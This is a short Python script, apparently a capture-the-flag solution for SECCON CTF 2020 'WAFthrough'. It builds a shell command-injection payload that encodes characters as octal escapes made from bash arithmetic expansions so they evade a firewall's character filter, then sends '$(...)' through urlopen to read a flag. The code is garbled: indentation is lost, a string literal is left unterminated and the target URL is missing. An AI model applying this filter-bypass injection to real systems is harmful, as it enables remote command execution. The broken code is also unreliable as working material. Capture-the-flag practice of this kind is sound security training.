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Created October 11, 2020 06:30
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SECCON CTF 2020 - WAFthrough
from urllib.request import urlopen
from urllib import request
import string
def escape(val):
return '''
used = []
def gen_lit(c):
if c not in used:
if c not in 'usrbinflagUSRBINFLAG1234567890vwxyz cpth':
if c in string.ascii_letters:
return c
s = oct(ord(c))[2:]
ret = ""
for n in s:
n = int(n)
if n == 0:
ret += '$?'
if n == 1:
ret += '$((_**_))'
ret += '$((({})/$$))'.format('+'.join(['$$' for i in range(n)]))
return "\\\\{}".format(ret)
def gen_payload(payload):
return '''
'''[1:-1].format(''.join([gen_lit(v) for v in payload]))
payload = gen_payload('flag')
res = urlopen('[$({})]'.format(payload))
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